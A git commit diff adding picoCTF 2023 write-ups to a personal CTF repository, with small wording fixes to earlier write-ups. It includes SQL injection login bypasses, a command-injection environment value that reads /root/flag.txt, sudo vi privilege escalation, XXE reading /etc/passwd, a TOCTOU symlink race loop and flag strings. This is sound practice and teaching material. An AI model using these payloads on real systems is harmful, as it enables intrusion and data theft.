feat: added picoCTF

0xL4ugh CTF 2023/XSS 1/README.md

@@ -9,7 +9,7 @@ In the website there is a feature to upload an image file like this
 
 ![preview](images/preview.png)
 
-And after we upload a file for example `image.png`, we can access the file by accessing `/uploads/RANDOMCHARACTER/image.png` endpoint. In this chall, we only can upload a file that using `.png` extension. To bypass this whitelist, we need to upload a file named `.png` So the server will read the file as hidden directories.
+And after we upload a file for example `image.png`, we can access the file by accessing `/uploads/RANDOMCHARACTER/image.png` endpoint. In this chall, we only can upload a file that using `.png` extension. To bypass this whitelist, We need to upload a file with the `.png` extension so the server will read the file as hidden directories.
 
 At first we can get the flag easily and then the admin revise the chall and added more difficulty by adding `HttpOnly` flag on the bot so we need to bypass the `HttpOnly` flag. Luckily there is `phpinfo` file and we can use it to bypass the `HttpOnly` flag. So the payload will look like this
 

CTF After Dark - Winter 2023/Bank/README.md

@@ -11,7 +11,7 @@ This is SQL injection chall and we need to get the flag from the database, lucki
 
 ![input](images/input.png)
 
-And we know the flag is located on `flags` table and in that table there are 2 columns named `flag` and `value` So we can input the payload like this
+And we know the flag was located on `flags` table and in that table there are 2 columns. `flag` and `value` So we can input the payload like this
 
 ```
 Username: ' union select group_concat(flag, value),2,3 from flags-- -

OmWars CTF 2023 Quals/spice/README.md

@@ -148,7 +148,7 @@ And then change it to hex
 2b2b2b2b2b2b2b2b2b2b5b3e2b3e2b2b2b3e2b2b2b2b2b2b2b3e2b2b2b2b2b2b2b2b2b2b3c3c3c3c2d5d3e3e3e3e2b2e2b2b2b2b2b2b2b2b2b2e2b2b2b2b2b2b2b2b2e
 ```
 
-Send the payload to the server using `bf_base16` parameter and you will get the flag because the flag is located on environtment var
+Send the payload to the server using `bf_base16` parameter and you will get the flag because the flag was located on environment var
 
 ![flag](images/flag.png)
 

README.md

@@ -26,6 +26,7 @@ List of CTF events that i have joined before
 | SpringForwardCTF 2023 | 11 March, 08:00 WIB — 12 March 2023, 20:00 WIB | [Link](/SpringForwardCTF%202023/) |
 | DaVinci CTF 2023 | 11 March, 15:00 WIB — 13 March 2023, 03:00 WIB | [Link](/DaVinci%20CTF%202023/) |
 | UTCTF 2023 | 11 March, 15:00 WIB — 13 March 2023, 03:00 WIB | [Link](/UTCTF%202023/) |
+| picoCTF 2023 | 14 March, 23:00 WIB — 29 March 2023, 02:00 WIB | [Link](/picoCTF%202023/) |
 | VikeCTF 2023 | 17 March, 23:00 WIB — 19 March 2023, 23:00 WIB	| [Link](/vikeCTF%202023/) |
 | WolvCTF 2023 | 18 March, 03:00 WIB — 20 March 2023, 03:00 WIB	| [Link](/WolvCTF%202023/) |
 | b01lers CTF 2023 | 18 March, 05:00 WIB — 20 March 2023, 05:00 WIB | [Link](/b01lers%20CTF%202023/) |

VU CYBERTHON 2023/Find MSISDN Number/README.md

@@ -5,7 +5,7 @@
 We need to find the MSISDN Number
 
 ## How to Solve?
-We can get the MSISDN Number in the `root/media/0/Download` directory and find an image named `20221017_145325.jpg`
+We can get the MSISDN Number in the `root/media/0/Download` directory and find an image called `20221017_145325.jpg`
 
 ![msisdn](images/msisdn.png)
 

WxMCTF 2023/WxMCTF Web 3 - NFTs/README.md

@@ -109,7 +109,7 @@ def command_server(command):
 -----------------------------263566758113396374204204538370--
 ```
 
-After sending the request, I wait 1 sec and then I access `http://example/test/env` to get the flag because the flag is located on the environtment
+After sending the request, Im waiting for 1 sec and then I access `http://example/test/env` to get the flag because the flag was located on the environment
 
 ```
 Because the instance was dead, there is no flag here

b01lers CTF 2023/abhs/README.md

@@ -11,7 +11,7 @@ First, we try to execute `env` command and the result is
 
 ![env](images/env.png)
 
-As you can see there is an interesting environtment variable called `_` and the value is `/usr/bin/python3`
+As you can see there is an interesting environment variable called `_` and the value is `/usr/bin/python3`
 
 If we input `_$` on the server. The server will be executing a `/usr/bin/python3`
 

b01lers CTF 2023/warmup/README.md

@@ -19,7 +19,7 @@ Now we got another file called `app.py`. Now, try to access app.py endpoint (Don
 
 ![app](images/app.png)
 
-As you can see the flag is located in `flag.txt` endpoint. But we can't access it directly because there is a function called `validate` to detect if our input is `flag.txt` or not
+As you can see the flag was located in `flag.txt` endpoint. But we can't access it directly because there is a function called `validate` to detect if our input is `flag.txt` or not
 
 ```python
 def validate(data):

picoCTF 2023/More SQLi/README.md

@@ -0,0 +1,35 @@
+# More SQLi
+> Can you find the flag on this website.
+
+## About the Challenge
+We have been given a simple website that contains login form, here is the preview of the website
+
+![preview](images/preview.png)
+
+## How to Solve?
+If you found a login form on the CTF competition, the need to check if the form is vulnerable to SQL injection. So I tried to input this into the login form
+
+```
+Username: ' or true-- -
+Password: d
+```
+
+And the output is
+
+![output](images/output.png)
+
+We still can't log into the dashboard, but we can see the query running on the login form. So to bypass the login form, we need to input `' or true-- -` in the password form
+
+![dashboard](images/dashboard.png)
+
+As you can see we can login into an admin dashboard and then there is a search form. And of course we need to do SQL injection again in the search form to obtain the flag. In this case i'll be using SQLMap to exploit the vulnerability
+
+![sqlmap](images/sqlmap.png)
+
+As you can see the SQLMap detect the `search` parameter is vulnerable to SQL injection. And to obtain the flag we need to dump the database using `--dump` switches
+
+![flag](images/flag.png)
+
+```
+picoCTF{G3tting_5QL_1nJ3c7I0N_l1k3_y0u_sh0ulD_c8b7cc2a}
+```

picoCTF 2023/Permissions/README.md

@@ -0,0 +1,22 @@
+# Permissions
+> Can you read files in the root file?
+
+## About the Challenge
+We have been given an access to SSH server and then we need to read the flag in the `root` directory
+
+## How to Solve?
+If we check the `sudo` configuration
+
+![sudo](images/sudo.png)
+
+There are only 1 commands that we can use, `/usr/bin/vi`. In this case we will be using `/usr/bin/vi` command to do privilege escalation (Im using [GTFOBins](https://gtfobins.github.io/gtfobins/vi/#sudo) to do privilege escalation)
+
+![privesc](images/privesc.png)
+
+And then go to `/root` directory and read `.flag.txt` to obtain the flag
+
+![flag](images/flag.png)
+
+```
+picoCTF{uS1ng_v1m_3dit0r_55878b51}
+```

picoCTF 2023/README.md

@@ -0,0 +1,19 @@
+# picoCTF 2023
+CTF writeup for The picoCTF 2023. I took part in this CTF competition with the TCP1P team, and got 579th place out of 6918 teams
+
+Thanks to the team especially @dimasma0305, @rennfurakawa, @Muhammad Reza Pahlevi, @dRe
+
+| Category | Challenge |
+| --- | --- |
+| Binary Exploitation | [hijacking](/picoCTF%202023/hijacking/)
+| Binary Exploitation | [tic-tac](/picoCTF%202023/tic-tac/)
+| Binary Exploitation | [VNE](/picoCTF%202023/VNE/)
+| Reverse Engineering | [Ready Gladiator 0](/picoCTF%202023/Ready%20Gladiator%200/)
+| Reverse Engineering | [Safe Opener 2](/picoCTF%202023/Safe%20Opener%202/)
+| Web Exploitation | [SOAP](/picoCTF%202023/SOAP/)
+| Web Exploitation | [More SQLi](/picoCTF%202023/More%20SQLi/)
+| General Skills | [chrono](/picoCTF%202023/chrono/)
+| General Skills | [Permissions](/picoCTF%202023/Permissions/)
+| General Skills | [Rules 2023](/picoCTF%202023/Rules%202023/)
+| General Skills | [useless](/picoCTF%202023/useless/)
+| General Skills | [Special](/picoCTF%202023/Special/)

picoCTF 2023/Ready Gladiator 0/README.md

@@ -0,0 +1,38 @@
+# Ready Gladiator 0
+> Can you make a CoreWars warrior that always loses, no ties?
+
+## About the Challenge
+We have been given a file called `imp.red` (You can download the file [here](imp.red)) and we need to find a way to make the `Warrior 1` lose
+
+![preview](images/preview.png)
+
+Also here is the content of `imp.red`
+
+```
+;redcode
+;name Imp Ex
+;assert 1
+mov 0, 1
+end
+```
+
+The code will move the value `1` to register `0`
+
+## How to Solve?
+Actually i don't know anything about `CoreWars` code but to solve this I just changed the from value `1` to value `0` to obtain the flag
+
+```
+;redcode
+;name Imp Ex
+;assert 1
+mov 0, 0
+end
+```
+
+And luckily I got the flag
+
+![flag](images/flag.png)
+
+```
+picoCTF{h3r0_t0_z3r0_4m1r1gh7_f1e207c4}
+```

picoCTF 2023/Ready Gladiator 0/imp.red

@@ -0,0 +1,5 @@
+;redcode
+;name Imp Ex
+;assert 1
+mov 0, 1
+end

picoCTF 2023/Rules 2023/README.md

@@ -0,0 +1,16 @@
+# Rules 2023
+> Read the rules of the competition and get a little bonus!
+
+## About the Challenge
+We need to check https://picoctf.org/competitions/2023-spring-rules.html page to obtain the flag
+
+![preview](images/preview.png)
+
+## How to Solve?
+Check the source code by pressing `CTRL + U` button or you can use inspect element and then find `picoctf{`
+
+![flag](images/flag.png)
+
+```
+picoCTF{h34rd_und3r5700d_4ck_cba1c711}
+```

picoCTF 2023/SOAP/README.md

@@ -0,0 +1,22 @@
+# SOAP
+> The web project was rushed and no security assessment was done. Can you read the /etc/passwd file?
+
+## About the Challenge
+We have been given a simple website, here is the preview of the website
+
+![preview](images/preview.png)
+
+## How to Solve?
+If we press `Details`, we will see this HTTP request
+
+![request](images/request.png)
+
+The first thing that comes to my mind is XXE vulnerability. So as the chall says, we need to read `/etc/passwd` file to obtain the flag. 
+
+Im using this GitHub repository to find the correct payload (You can check the repo [here](https://github.com/payloadbox/xxe-injection-payload-list)) And here is the HTTP request to read `/etc/passwd` file
+
+![flag](images/flag.png)
+
+```
+picoCTF{XML_3xtern@l_3nt1t1ty_e79a75d4}
+```

picoCTF 2023/Safe Opener 2/README.md

@@ -0,0 +1,16 @@
+# Safe Opener 2
+> What can you do with this file?
+
+> I forgot the key to my safe but this file is supposed to help me with retrieving the lost key. Can you help me unlock my safe?
+
+## About the Challenge
+We have been given a file called `SafeOpener.class` (You can download the file [here](SafeOpener.class)) and we need to find the flag inside the file
+
+## How to Solve?
+It's easy, just open the file using your lovely text editor and you will see the flag
+
+![flag](images/flag.png)
+
+```
+picoCTF{SAf3_0p3n3rr_y0u_solv3d_it_5bfbd6f1}
+```

picoCTF 2023/Special/README.md

@@ -0,0 +1,23 @@
+# Special
+> Don't power users get tired of making spelling mistakes in the shell? Not anymore! Enter Special, the Spell Checked Interface for Affecting Linux. Now, every word is properly spelled and capitalized... automatically and behind-the-scenes! Be the first to test Special in beta, and feel free to tell us all about how Special streamlines every development process that you face. When your co-workers see your amazing shell interface, just tell them: That's Special (TM)
+
+## About the Challenge
+We have been given an access to SSH server and we need to find the flag in the server (But there is an autocorrect if we input some commands)
+
+![preview](images/preview.png)
+
+## How to Solve?
+To solve this chall, im using `$()`, so here is the command that I used
+
+```shell
+$(ls)
+$(cat<blargh/flag.txt)
+```
+
+First im using `ls` command to find where is the flag, and then there is a directory called `blargh` and then im trying to open the flag using `cat` command inside `blargh` directory
+
+![flag](images/flag.png)
+
+```
+picoCTF{5p311ch3ck_15_7h3_w0r57_f906e25a}
+```

picoCTF 2023/VNE/README.md

@@ -0,0 +1,44 @@
+# VNE
+> We've got a binary that can list directories as root, try it out !!
+
+> Additional details will be available after launching your challenge instance.
+
+## About the Challenge
+We have been given an access to SSH server and then there is a file called `bin` and if we run the file
+
+![preview](images/preview.png)
+
+## How to Solve?
+If we set an environment variables called `SECRET_DIR` and the value is `/root` because we need to know what is inside `/root` directory. You can use this command
+
+```shell
+export SECRET_DIR=/root
+```
+
+Here is the output
+
+![list](images/list.png)
+
+As you can see there is a file called `flag.txt` and we need to read the content of the file to obtain the flag. If we check the string of the `bin` file using this command
+
+```shell
+strings bin
+```
+
+Here is the output
+
+![strings](images/strings.png)
+
+As you can see the file using `system()` function to listing a directory, so the idea here, we need to do Command injection by adding `; command` in the `SECRET_DIR` environment variable values. So for example
+
+```shell
+export SECRET_DIR="/root;cat /root/flag.txt"
+```
+
+And then rerun the program to obtain the flag
+
+![flag](images/flag.png)
+
+```
+picoCTF{Power_t0_man!pul4t3_3nv_cdeb2a4d}
+```

picoCTF 2023/chrono/README.md

@@ -0,0 +1,20 @@
+# chrono
+> How to automate tasks to run at intervals on linux servers?
+
+## About the Challenge
+We have been given an access to SSH server and then we need to find the flag in the server
+
+## How to Solve?
+If we read the description of the flag, we can assume the flag was located on the cron file, so to solve this chall im using this command
+
+```
+cat /etc/cron*
+```
+
+This command will read any file that start with `cron`. And here is the output
+
+![flag](images/flag.png)
+
+```
+picoCTF{Sch3DUL7NG_T45K3_L1NUX_5b7059d0}
+```

picoCTF 2023/hijacking/README.md

@@ -0,0 +1,26 @@
+# hijacking
+> Getting root access can allow you to read the flag. Luckily there is a python file that you might like to play with.
+
+> Additional details will be available after launching your challenge instance.
+
+## About the Challenge
+We have been given an access to SSH server and then there is a file called `.server.py` and if we check the content of the file
+
+![preview](images/preview.png)
+
+## How to Solve?
+Im using unintended way to solve this chall, because if we check the `sudo` configuration
+
+![sudo](images/sudo.png)
+
+There are 2 following commands that we can use, `/usr/bin/vi` or file `.server.py`. In this case im using `/usr/bin/vi` command to do privilege escalation (Im using [GTFOBins](https://gtfobins.github.io/gtfobins/vi/#sudo) to do privilege escalation)
+
+![privesc](images/privesc.png)
+
+And then go to `/root` directory and read `.flag.txt` to obtain the flag
+
+![flag](images/flag.png)
+
+```
+picoCTF{pYth0nn_libraryH!j@CK!n9_13cfd3cc}
+```

picoCTF 2023/tic-tac/README.md

@@ -0,0 +1,72 @@
+# tic-tac
+> Someone created a program to read text files; we think the program reads files with root privileges but apparently it only accepts to read files that are owned by the user running it.
+
+> Additional details will be available after launching your challenge instance.
+
+## About the Challenge
+We have been given access to an SSH server, and there are 3 files in the `/home/ctf-player` directory. The files are `flag.txt` which contains the flag, `src.cpp` the source code of the file, and `txtreader` the compiled src.cpp file. Here is the content of the `src.cpp`
+
+```cpp
+#include <iostream>
+#include <fstream>
+#include <unistd.h>
+#include <sys/stat.h>
+
+int main(int argc, char *argv[]) {
+    if (argc != 2) {
+        std::cerr << "Usage: " << argv[0] << " <filename>" << std::endl;
+        return 1;
+    }                                                                                                                             
+    
+    std::string filename = argv[1];
+    std::ifstream file(filename);
+    struct stat statbuf;
+
+    // Check the file's status information.
+    if (stat(filename.c_str(), &statbuf) == -1) {
+        std::cerr << "Error: Could not retrieve file information" << std::endl;
+        return 1;
+    }
+    
+    // Check the file's owner.
+    if (statbuf.st_uid != getuid()) {
+        std::cerr << "Error: you don't own this file" << std::endl;
+        return 1;
+    }
+    // Read the contents of the file.
+    if (file.is_open()) {
+        std::string line;
+        while (getline(file, line)) {
+            std::cout << line << std::endl;
+        }
+    } else {
+        std::cerr << "Error: Could not open file" << std::endl;
+        return 1;
+        }
+    return 0;
+}
+```
+
+So if we run `./txtreader flag.txt`, the output is `Error: you don't own this file` because to open `flag.txt` file we need to login as `root` first
+
+![preview](images/preview.png)
+
+## How to Solve?
+If we check the tag of the chall is `TOCTOU` vulnerability (Time-Of-Check Time-Of-Use). And then im searching about `TOCTOU` vulnerability in C program and then I found this website (You can access the website [here](https://samsclass.info/127/proj/E10.htm))
+
+You run this command to solve the chall and obtain the flag
+
+```shell
+echo "PUBLIC INFORMATION" >> public
+for i in {1..1000}; do ln -sf flag.txt flip; ln -sf public flip; done
+while true; do ln -sf flag.txt flip; ln -sf public flip; done &
+for i in {1..30}; do ./txtreader flip; done
+```
+
+So, first you need to create a file that can be accessed by yourself called `public`. And then testing the flipping rate. And then flips the link from `public` to `flag.txt` rapidly and runs in the background. And then try to execute the `txtreader` file multiple times to get the flag
+
+![flag](images/flag.png)
+
+```
+picoCTF{ToctoU_!s_3a5y_0490d70a}
+```

picoCTF 2023/useless/README.md

@@ -0,0 +1,22 @@
+# useless
+> There's an interesting script in the user's home directory
+
+## About the Challenge
+We have been given an access to SSH server and then there is a file called `useless` and if we check the content of the file
+
+![preview](images/preview.png)
+
+## How to Solve?
+If we check the source code of the `useless` file, in the `else` block there is a hint. To obtain the flag, we need to read the manual of the file. So im using this command
+
+```shell
+man useless
+```
+
+Here is the output
+
+![flag](images/flag.png)
+
+```
+picoCTF{us3l3ss_ch4ll3ng3_3xpl0it3d_1888}
+```